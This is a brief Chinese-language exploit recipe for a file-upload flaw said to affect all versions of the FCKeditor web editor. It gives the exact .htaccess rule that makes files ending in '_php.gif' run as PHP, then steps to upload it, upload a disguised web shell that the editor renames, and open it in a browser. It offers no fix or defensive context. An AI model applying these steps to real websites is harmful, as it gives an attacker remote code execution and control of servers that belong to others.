FCKeditor编辑器全版本上传漏洞

漏洞利用方法: 1.创建一个htaccess文件: 加入以下代码： <FilesMatch “_php.gif”> SetHandler application/x-httpd-php </FilesMatch> 2.使用编辑器上传htaccess文件. 3.上传shell.php.gif 4.上传后shell.php.gif, 会自动被改名为 shell_php.gif 5.访问http://xxxx/上传目录/shell_php.gif